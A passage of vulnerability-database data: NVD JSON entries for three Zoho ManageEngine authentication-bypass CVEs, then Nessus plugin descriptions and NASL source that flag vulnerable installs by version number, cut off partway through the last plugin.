"availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44757"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2021-44757", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44757", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2022-07-13T18:04:18", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. 
For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-12T05:15:00", "type": "cve", "title": "CVE-2021-44515", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "id": "CVE-2021-44515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2022-03-23T19:10:37", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T17:15:00", "type": "cve", "title": "CVE-2021-40539", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-29T17:18:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus:6.0", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.8", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.0", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.4", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.5", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.2", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.7", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.3", "cpe:/a:zohocorp:manageengine_adselfservice_plus:4.5", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.0.6", "cpe:/a:zohocorp:manageengine_adselfservice_plus:6.1", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.1", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.6"], "id": "CVE-2021-40539", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:-:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5805:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5316:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5709:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5806:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4550:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5813:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5519:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4580:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5809:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5324:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5020:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5801:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5321:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5040:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5704:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5311:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5327:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5505:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4544:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5504:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5800:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5326:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5808:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5804:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4522:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5513:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5705:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5503:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5701:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5507:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5810:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5521:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5816:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5325:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5301:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5517:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5606:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5310:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5306:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5516:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5323:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5602:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5319:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4571:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5601:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5109:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5607:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5605:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4543:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5328:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5708:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5703:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5803:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5515:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5700:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4531:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4590:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4592:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5308:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5506:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4560:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5021:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5512:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5330:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5313:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5815:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5514:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5315:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5603:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5518:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5807:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4591:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4572:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5710:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5811:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5307:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5312:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4570:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5041:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5508:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5706:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5812:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5030:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5114:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5317:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5322:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5309:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5802:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5314:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4540:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5604:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5032:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5814:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5022:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5607:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5318:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5320:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5329:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5707:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.4:5400:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5600:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5702:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5502:*:*:*:*:*:*"]}]

**Nessus plugins:**

*Plugin 156790: ManageEngine Desktop Central < 10.1.2137.9 Authentication Bypass (CVE-2021-44757).* Local (credentialed) check, plugin file MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_9.NASL, version 1.4, published 2022-01-18, modified 2022-01-25, last seen 2022-07-30T20:45:35, CPE cpe:/a:zohocorp:manageengine_desktop_central, [https://www.tenable.com/plugins/nessus/156790](<https://www.tenable.com/plugins/nessus/156790>). CVSS v3.0 base 9.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N); CVSS v2 base 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N). Description: "The ManageEngine Desktop Central application running on the remote host is affected by an authentication bypass vulnerability which allows an adversary to bypass authentication and read unauthorized data or write an arbitrary zip file on the Desktop Central server. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number." Plugin source:

```nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156790);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/01/25");

  script_cve_id("CVE-2021-44757");
  script_xref(name:"IAVA", value:"2022-A-0040");

  script_name(english:"ManageEngine Desktop Central < 10.1.2137.9 Authentication Bypass (CVE-2021-44757)");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.");
  script_set_attribute(attribute:"description", value:
"The ManageEngine Desktop Central application running on the remote host is affected by an authentication bypass
vulnerability which allows an adversary to bypass authentication and read unauthorized data or write an arbitrary zip
file on the Desktop Central server.

Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version
number.");
  # https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?851289b8");
  # https://www.manageengine.com/products/desktop-central/cve-2021-44757.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?0266c4d4");
  script_set_attribute(attribute:"solution", value:
"See vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-44757");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2022/01/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2022/01/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2022/01/18");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:zohocorp:manageengine_desktop_central");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows");

  script_copyright(english:"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("manageengine_desktop_central_installed.nbin");
  script_require_keys("installed_sw/ManageEngine Desktop Central");

  exit(0);
}

include('vcf.inc');

var app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);

var constraints = [
  {'fixed_version':'10.1.2137.9'},
  {'min_version':'10.1.2140', 'fixed_version':'10.1.2150', 'fixed_display':'See vendor advisory'}
];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
```

Note the second constraint: builds from 10.1.2140 up to (but not including) 10.1.2150 are also flagged, with the fix shown only as "See vendor advisory", so a Desktop Central install in that build range is not cleared by this plugin simply because it is newer than 10.1.2137.9.

*Plugin 159203: ManageEngine Desktop Central < 10.1.2137.9 Authentication Bypass (uncredentialed check).* Remote check shipped as a compiled plugin (MANAGEENGINE_DESKTOP_CENTRAL_CVE-2021-44757.NBIN; no source is published), published 2022-03-24, modified 2022-08-15, last seen 2022-08-15T22:42:13, CPE cpe:/a:zohocorp:manageengine_desktop_central, [https://www.tenable.com/plugins/nessus/159203](<https://www.tenable.com/plugins/nessus/159203>). CVSS v3.0 base 9.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N); CVSS v2 base 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N). Description: "The ManageEngine Desktop Central application running on the remote host is affected by an authentication bypass vulnerability. An unauthenticated, remote attacker can exploit this to read sensitive information or upload an arbitrary ZIP archive to the server."

*Plugin 155865: ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515).* Local check, plugin file MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL, version 1.7, published 2021-12-06, modified 2022-03-22, last seen 2022-08-07T15:05:15, CPE cpe:/a:zohocorp:manageengine_desktop_central, [https://www.tenable.com/plugins/nessus/155865](<https://www.tenable.com/plugins/nessus/155865>). CVSS v3.0 base 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C). Description: "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number." Plugin source:

```nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(155865);
  script_version("1.7");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/03/22");

  script_cve_id("CVE-2021-44515");
  script_xref(name:"IAVA", value:"2021-A-0570");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2021/12/24");

  script_name(english:"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.");
  script_set_attribute(attribute:"description", value:
"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior
to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to
bypass authentication and execute arbitrary code in the Desktop Central server.

Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version
number.");
  # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?fa9e3175");
  script_set_attribute(attribute:"solution", value:
"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-44515");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

